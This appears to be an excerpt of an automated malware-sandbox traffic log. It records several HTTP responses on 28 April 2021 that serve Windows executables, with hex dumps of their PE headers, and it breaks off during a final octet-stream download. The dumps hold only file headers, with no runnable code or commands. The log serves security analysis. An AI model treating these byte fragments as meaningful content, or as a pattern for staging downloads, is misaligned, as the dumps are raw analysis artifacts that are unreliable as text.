                              Source: global trafficHTTP traffic detected: HTTP/1.1 200 OKServer: nginxDate: Wed, 28 Apr 2021 20:58:42 GMTContent-Type: application/x-msdos-programContent-Length: 137168Connection: keep-aliveLast-Modified: Wed, 14 Nov 2018 15:53:50 GMTETag: "217d0-57aa1f0b0df80"Expires: Thu, 29 Apr 2021 20:58:42 GMTCache-Control: max-age=86400X-Cache-Status: EXPIREDX-Cache-Status: HITAccept-Ranges: bytesData Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 18 01 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 8d c2 55 b1 c9 a3 3b e2 c9 a3 3b e2 c9 a3 3b e2 c0 db a8 e2 d9 a3 3b e2 57 03 fc e2 cb a3 3b e2 10 c1 38 e3 c7 a3 3b e2 10 c1 3f e3 c2 a3 3b e2 10 c1 3a e3 cd a3 3b e2 10 c1 3e e3 db a3 3b e2 eb c3 3a e3 c0 a3 3b e2 c9 a3 3a e2 77 a3 3b e2 02 c0 3f e3 c8 a3 3b e2 02 c0 3e e3 dd a3 3b e2 02 c0 3b e3 c8 a3 3b e2 02 c0 c4 e2 c8 a3 3b e2 02 c0 39 e3 c8 a3 3b e2 52 69 63 68 c9 a3 3b e2 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 50 45 00 00 4c 01 06 00 c4 5f eb 5b 00 00 00 00 00 00 00 00 e0 00 22 21 0b 01 0e 0b 00 7a 01 00 00 86 00 00 00 00 00 00 e0 82 01 00 00 10 00 00 00 90 01 00 00 00 00 10 00 10 00 00 00 02 00 00 06 00 01 00 00 00 00 00 06 00 01 00 00 00 00 00 00 40 02 00 00 04 00 00 16 33 02 00 02 00 40 41 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 40 c0 01 00 74 1e 00 00 b4 de 01 00 2c 01 00 00 00 20 02 00 78 03 00 00 00 00 00 00 00 00 00 00 00 fa 01 00 d0 1d 00 00 00 30 02 00 68 0c 00 00 00 b9 01 00 54 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 54 b9 01 00 18 00 00 00 68 b8 01 00 40 00 00 00 00 00 00 00 00 00 00 00 00 90 01 00 f4 02 00 00 6c be 01 00 80 00 00 00 00 00 00 00 00 00 00 00 00 00 
00 00 00 00 00 00 2e 74 65 78 74 00 00 00 ca 78 01 00 00 10 00 00 00 7a 01 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 60 2e 72 64 61 74 61 00 00 5e 65 00 00 00 90 01 00 00 66 00 00 00 7e 01 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 64 61 74 61 00 00 00 bc 0b 00 00 00 00 02 00 00 02 00 00 00 e4 01 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 64 69 64 61 74 00 00 38 00 00 00 00 10 02 00 00 02 00 00 00 e6 01 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 72 73 72 63 00 00 00 78 03 00 00 00 20 02 00 00 04 00 00 00 e8 01 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 72 65 6c 6f 63 00 00 68 0c 00 00 00 30 02 00 00 0e 00 00 00 ec 01 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 42 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 0
                              Source: global trafficHTTP traffic detected: HTTP/1.1 200 OKServer: nginxDate: Wed, 28 Apr 2021 20:58:42 GMTContent-Type: application/x-msdos-programContent-Length: 440120Connection: keep-aliveLast-Modified: Wed, 14 Nov 2018 15:53:50 GMTETag: "6b738-57aa1f0b0df80"Expires: Thu, 29 Apr 2021 20:58:42 GMTCache-Control: max-age=86400X-Cache-Status: EXPIREDX-Cache-Status: HITAccept-Ranges: bytesData Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 f8 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 a6 c8 bc 41 e2 a9 d2 12 e2 a9 d2 12 e2 a9 d2 12 56 35 3d 12 e0 a9 d2 12 eb d1 41 12 fa a9 d2 12 3b cb d3 13 e1 a9 d2 12 e2 a9 d3 12 22 a9 d2 12 3b cb d1 13 eb a9 d2 12 3b cb d6 13 ee a9 d2 12 3b cb d7 13 f4 a9 d2 12 3b cb da 13 95 a9 d2 12 3b cb d2 13 e3 a9 d2 12 3b cb 2d 12 e3 a9 d2 12 3b cb d0 13 e3 a9 d2 12 52 69 63 68 e2 a9 d2 12 00 00 00 00 00 00 00 00 50 45 00 00 4c 01 06 00 16 38 27 59 00 00 00 00 00 00 00 00 e0 00 22 21 0b 01 0e 0b 00 04 06 00 00 82 00 00 00 00 00 00 50 b1 03 00 00 10 00 00 00 20 06 00 00 00 00 10 00 10 00 00 00 02 00 00 06 00 00 00 0a 00 00 00 06 00 00 00 00 00 00 00 00 d0 06 00 00 04 00 00 61 7a 07 00 03 00 40 41 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 f0 43 04 00 82 cf 01 00 f4 52 06 00 2c 01 00 00 00 80 06 00 f8 03 00 00 00 00 00 00 00 00 00 00 00 78 06 00 38 3f 00 00 00 90 06 00 34 3a 00 00 f0 66 00 00 38 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 c8 28 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 50 06 00 f0 02 00 00 98 40 04 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 2e 74 65 78 74 00 00 00 72 03 06 00 00 10 00 00 00 04 06 00 00 04 00 00 00 00 
00 00 00 00 00 00 00 00 00 00 20 00 00 60 2e 64 61 74 61 00 00 00 10 28 00 00 00 20 06 00 00 18 00 00 00 08 06 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 69 64 61 74 61 00 00 36 14 00 00 00 50 06 00 00 16 00 00 00 20 06 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 64 69 64 61 74 00 00 34 00 00 00 00 70 06 00 00 02 00 00 00 36 06 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 72 73 72 63 00 00 00 f8 03 00 00 00 80 06 00 00 04 00 00 00 38 06 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 72 65 6c 6f 63 00 00 34 3a 00 00 00 90 06 00 00 3c 00 00 00 3c 06 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 42 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 0
                              Source: global trafficHTTP traffic detected: HTTP/1.1 200 OKServer: nginxDate: Wed, 28 Apr 2021 20:58:43 GMTContent-Type: application/x-msdos-programContent-Length: 1246160Connection: keep-aliveLast-Modified: Wed, 14 Nov 2018 15:53:50 GMTETag: "1303d0-57aa1f0b0df80"Expires: Thu, 29 Apr 2021 20:58:43 GMTCache-Control: max-age=86400X-Cache-Status: EXPIREDX-Cache-Status: HITAccept-Ranges: bytesData Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 10 01 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 23 83 34 8c 67 e2 5a df 67 e2 5a df 67 e2 5a df 6e 9a c9 df 73 e2 5a df be 80 5b de 65 e2 5a df f9 42 9d df 63 e2 5a df be 80 59 de 6a e2 5a df be 80 5f de 6d e2 5a df be 80 5e de 6c e2 5a df 45 82 5b de 6f e2 5a df ac 81 5b de 64 e2 5a df 67 e2 5b df 90 e2 5a df ac 81 5e de 6d e3 5a df ac 81 5a de 66 e2 5a df ac 81 a5 df 66 e2 5a df ac 81 58 de 66 e2 5a df 52 69 63 68 67 e2 5a df 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 50 45 00 00 4c 01 05 00 ad 62 eb 5b 00 00 00 00 00 00 00 00 e0 00 22 21 0b 01 0e 0b 00 ea 0e 00 00 1e 04 00 00 00 00 00 77 f0 0e 00 00 10 00 00 00 00 0f 00 00 00 00 10 00 10 00 00 00 02 00 00 06 00 01 00 00 00 00 00 06 00 01 00 00 00 00 00 00 40 13 00 00 04 00 00 b7 bb 13 00 02 00 40 01 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 00 9d 11 00 88 a0 00 00 88 3d 12 00 54 01 00 00 00 b0 12 00 70 03 00 00 00 00 00 00 00 00 00 00 00 e6 12 00 d0 1d 00 00 00 c0 12 00 14 7d 00 00 70 97 11 00 54 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 c8 97 11 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 0f 00 f8 03 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 2e 74 
65 78 74 00 00 00 81 e8 0e 00 00 10 00 00 00 ea 0e 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 60 2e 72 64 61 74 61 00 00 10 52 03 00 00 00 0f 00 00 54 03 00 00 ee 0e 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 64 61 74 61 00 00 00 74 47 00 00 00 60 12 00 00 22 00 00 00 42 12 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 72 73 72 63 00 00 00 70 03 00 00 00 b0 12 00 00 04 00 00 00 64 12 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 72 65 6c 6f 63 00 00 14 7d 00 00 00 c0 12 00 00 7e 00 00 00 68 12 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 42 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
                              Source: global trafficHTTP traffic detected: HTTP/1.1 200 OKServer: nginxDate: Wed, 28 Apr 2021 20:58:44 GMTContent-Type: application/x-msdos-programContent-Length: 144848Connection: keep-aliveLast-Modified: Wed, 14 Nov 2018 15:53:50 GMTETag: "235d0-57aa1f0b0df80"Expires: Thu, 29 Apr 2021 20:58:44 GMTCache-Control: max-age=86400X-Cache-Status: EXPIREDX-Cache-Status: HITAccept-Ranges: bytesData Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 01 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 a2 6c 24 1c e6 0d 4a 4f e6 0d 4a 4f e6 0d 4a 4f ef 75 d9 4f ea 0d 4a 4f 3f 6f 4b 4e e4 0d 4a 4f 3f 6f 49 4e e4 0d 4a 4f 3f 6f 4f 4e ec 0d 4a 4f 3f 6f 4e 4e ed 0d 4a 4f c4 6d 4b 4e e4 0d 4a 4f 2d 6e 4b 4e e5 0d 4a 4f e6 0d 4b 4f 7e 0d 4a 4f 2d 6e 4e 4e f2 0d 4a 4f 2d 6e 4a 4e e7 0d 4a 4f 2d 6e b5 4f e7 0d 4a 4f 2d 6e 48 4e e7 0d 4a 4f 52 69 63 68 e6 0d 4a 4f 00 00 00 00 00 00 00 00 50 45 00 00 4c 01 05 00 bf 62 eb 5b 00 00 00 00 00 00 00 00 e0 00 22 21 0b 01 0e 0b 00 b6 01 00 00 62 00 00 00 00 00 00 97 bc 01 00 00 10 00 00 00 d0 01 00 00 00 00 10 00 10 00 00 00 02 00 00 06 00 01 00 00 00 00 00 06 00 01 00 00 00 00 00 00 50 02 00 00 04 00 00 09 b1 02 00 02 00 40 01 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 10 03 02 00 a8 00 00 00 b8 03 02 00 c8 00 00 00 00 30 02 00 78 03 00 00 00 00 00 00 00 00 00 00 00 18 02 00 d0 1d 00 00 00 40 02 00 60 0e 00 00 d0 fe 01 00 54 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 28 ff 01 00 40 00 00 00 00 00 00 00 00 00 00 00 00 d0 01 00 6c 02 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 2e 74 65 78 74 00 00 00 cb b4 01 00 00 10 00 00 00 b6 
01 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 60 2e 72 64 61 74 61 00 00 0a 44 00 00 00 d0 01 00 00 46 00 00 00 ba 01 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 64 61 74 61 00 00 00 00 07 00 00 00 20 02 00 00 04 00 00 00 00 02 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 72 73 72 63 00 00 00 78 03 00 00 00 30 02 00 00 04 00 00 00 04 02 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 72 65 6c 6f 63 00 00 60 0e 00 00 00 40 02 00 00 10 00 00 00 08 02 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 42 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 0
                              Source: global trafficHTTP traffic detected: HTTP/1.1 200 OKServer: nginxDate: Wed, 28 Apr 2021 20:58:44 GMTContent-Type: application/x-msdos-programContent-Length: 83784Connection: keep-aliveLast-Modified: Wed, 14 Nov 2018 15:53:50 GMTETag: "14748-57aa1f0b0df80"Expires: Thu, 29 Apr 2021 20:58:44 GMTCache-Control: max-age=86400X-Cache-Status: EXPIREDX-Cache-Status: HITAccept-Ranges: bytesData Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 f0 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 01 f9 a3 4e 45 98 cd 1d 45 98 cd 1d 45 98 cd 1d f1 04 22 1d 47 98 cd 1d 4c e0 5e 1d 4e 98 cd 1d 45 98 cc 1d 6c 98 cd 1d 9c fa c9 1c 55 98 cd 1d 9c fa ce 1c 56 98 cd 1d 9c fa c8 1c 41 98 cd 1d 9c fa c5 1c 5f 98 cd 1d 9c fa cd 1c 44 98 cd 1d 9c fa 32 1d 44 98 cd 1d 9c fa cf 1c 44 98 cd 1d 52 69 63 68 45 98 cd 1d 00 00 00 00 00 00 00 00 50 45 00 00 4c 01 05 00 0c 38 27 59 00 00 00 00 00 00 00 00 e0 00 22 21 0b 01 0e 0b 00 ea 00 00 00 20 00 00 00 00 00 00 00 ae 00 00 00 10 00 00 00 00 01 00 00 00 00 10 00 10 00 00 00 02 00 00 06 00 00 00 0a 00 00 00 06 00 00 00 00 00 00 00 00 40 01 00 00 04 00 00 bc 11 02 00 03 00 40 41 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 b0 f0 00 00 14 09 00 00 c0 10 01 00 8c 00 00 00 00 20 01 00 08 04 00 00 00 00 00 00 00 00 00 00 00 08 01 00 48 3f 00 00 00 30 01 00 94 0a 00 00 b0 1f 00 00 38 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 e8 1f 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 10 01 00 bc 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 2e 74 65 78 74 00 00 00 c4 e9 00 00 00 10 00 00 00 ea 00 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 
00 20 00 00 60 2e 64 61 74 61 00 00 00 44 06 00 00 00 00 01 00 00 02 00 00 00 ee 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 69 64 61 74 61 00 00 b8 05 00 00 00 10 01 00 00 06 00 00 00 f0 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 72 73 72 63 00 00 00 08 04 00 00 00 20 01 00 00 06 00 00 00 f6 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 72 65 6c 6f 63 00 00 94 0a 00 00 00 30 01 00 00 0c 00 00 00 fc 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 42 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
                              Source: global traffic | HTTP traffic detected: HTTP/1.1 200 OK | Server: nginx | Date: Wed, 28 Apr 2021 20:58:52 GMT | Content-Type: application/octet-stream | Content-Length: 290304 | Last-Modified: Wed, 28 Apr 2021 08:31:27 GMT | Connection: keep-alive | ETag: "60891d5f-46e00" | Cache-Control: public, must-revalidate, proxy-revalidate | Accept-Ranges: bytes | Data Raw: 4d